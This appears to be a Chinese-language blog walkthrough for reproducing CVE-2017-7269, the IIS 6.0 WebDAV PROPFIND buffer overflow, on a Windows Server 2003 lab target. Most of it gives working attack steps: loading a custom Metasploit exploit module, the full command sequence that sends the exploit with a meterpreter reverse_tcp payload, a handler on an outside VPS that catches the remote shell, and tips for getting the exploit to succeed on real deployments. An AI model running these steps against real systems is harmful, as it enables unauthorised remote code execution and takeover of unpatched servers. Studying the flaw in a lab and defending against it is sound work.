IIS6远程代码执行漏洞复现CVE-2017-7269

简述

CVE-2017-7269是IIS 6.0中存在的一个栈溢出漏洞,在IIS6.0处理PROPFIND指令的时候,由于对url的长度没有进行有效的长度控制和检查,导致执行memcpy对虚拟路径进行构造的时候,引发栈溢出,该漏洞可以导致远程代码执行。

测试环境

  • 受攻击系统:windows server 2003
  • 攻击系统:Kali 2018.04
  • 反弹主机:Ubuntu 18.04 LTS

CVE-2017-7269漏洞原理

由恶意的 PROPFIND 请求所引起:当 If 字段包含了 http://localhost/xxxx 这段超长URL时,导致缓冲区溢出(包括栈溢出和堆溢出)

具体位置在w3wp.exe,httpext模块的ScStoragePathFromUrl函数处。

  • httpext!ScStoragePathFromUrl+0x360 处复制内存时产生了堆溢出
  • 被溢出的堆块在 httpext!HrCheckIfHeader+0x0000013c 处分配;
  • 崩溃所在位置也是从函数 httpext!HrCheckIfHeader 执行过来的;

Metasploit5利用EXP

Metasploit加载自定义模块

加载自定义模块方法

1、  在home目录里的【$HOME/.msf4/modules/exploits/】里就是自定义的模块
2、  复制自定义模块到这个目录里调用,使用msf的reload_all就可以重新加载模块路径

在线加载EXP

# 创建EXP的路径
mkdir -p $HOME/.msf4/modules/exploits/test
# 示例模块加载
curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb


# 加载在线模块
todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1140    0  1140    0     0   3607      0 --:--:-- --:--:-- --:--:--  7808

本地加载EXP

mkdir -p $HOME/.msf4/modules/exploits/test
cp cve-2017-7269.rb ~/.msf4/modules/exploits/test/test_module.rb

Metasploit利用命令- CVE-2017-7269

# 示例用法
reload_all                        # 加载自定义模块
use exploit/test/test_module.rb   # 使用刚才加载模块的路径
show optins                       # 显示当前配置的选项
set RHOST <远程攻击IP>            # 远程攻击IP
set HttpHost <网站域名>           # 远程网站
set PhysicalPathLength <长度>     # 设置网站物理路径长度
set payload windows/meterpreter/reverse_tcp # 设置payload
set LHOST <监听IP>                # 监听IP
exploit                           # 漏洞测试 

# 使用
reload_all
use exploit/test/test_module.rb
show options
set RHOST 192.168.221.147
set HttpHost 192.168.221.147
set PhysicalPathLength 8
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.221.133
exploit

Metasploit反弹SHELL

实战过程中会反弹到外网的VPS上,Ubuntu VPS上安装Metasploit。

# 下载和安装metasploit
Curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

# 示例说明
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
exploit

# 使用
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 103.85.24.14
set LPORT 4444
exploit

把Metasploit的meterpreter当前shell后台运行用【background】命令。再调用起来用【sessions】就可以。

Windows server 2003实战问题

  • 问题1:网站本地路径的长度需要填写正确,不然触发不了缓冲溢出漏洞。例如下图路径长度为8:

  • 问题2:If头信息中的两个url是要求和站点绑定相匹配的, POC中if头里面的域名及端口与绑定不一致时会失败。
  • 问题3:IIS绑定的域名需要写
  • 问题4:同一个应用程序池下多个站点的情况,有时对某一个站点执行exp,会导致同应用程序池下面所有的网站全部返回500,出现这种情况可以找旁站因为每个池都是独立的w3wp进程,换一个可能在其他池的进行尝试。

参考文章

[1] msf模块说明
https://www.offensive-security.com/metasploit-unleashed/modules-and-locations/
[2] msf 使用说明
https://github.com/rapid7/metasploit-framework/wiki
[3] cve-2017-7269
https://github.com/zcgonvh/cve-2017-7269
[4] iis6.0远程代码执行漏洞复现(CVE-2017-7269)
https://blog.csdn.net/darkhq/article/details/79127820
[5] CVE-2017-7269 IIS6_WebDAV远程代码执行的正确打开方式
https://anquan.baidu.com/article/391
[6] https://www.ivoidwarranties.tech/posts/pentesting-tuts/metasploit/simple-attack/
[7] https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework
[8] CVE-2017-7269的几个技巧及BUG修正
https://www.secpulse.com/archives/57264.html

posted @ 2019-11-16 22:52  17bdw  阅读(...)  评论(... 编辑 收藏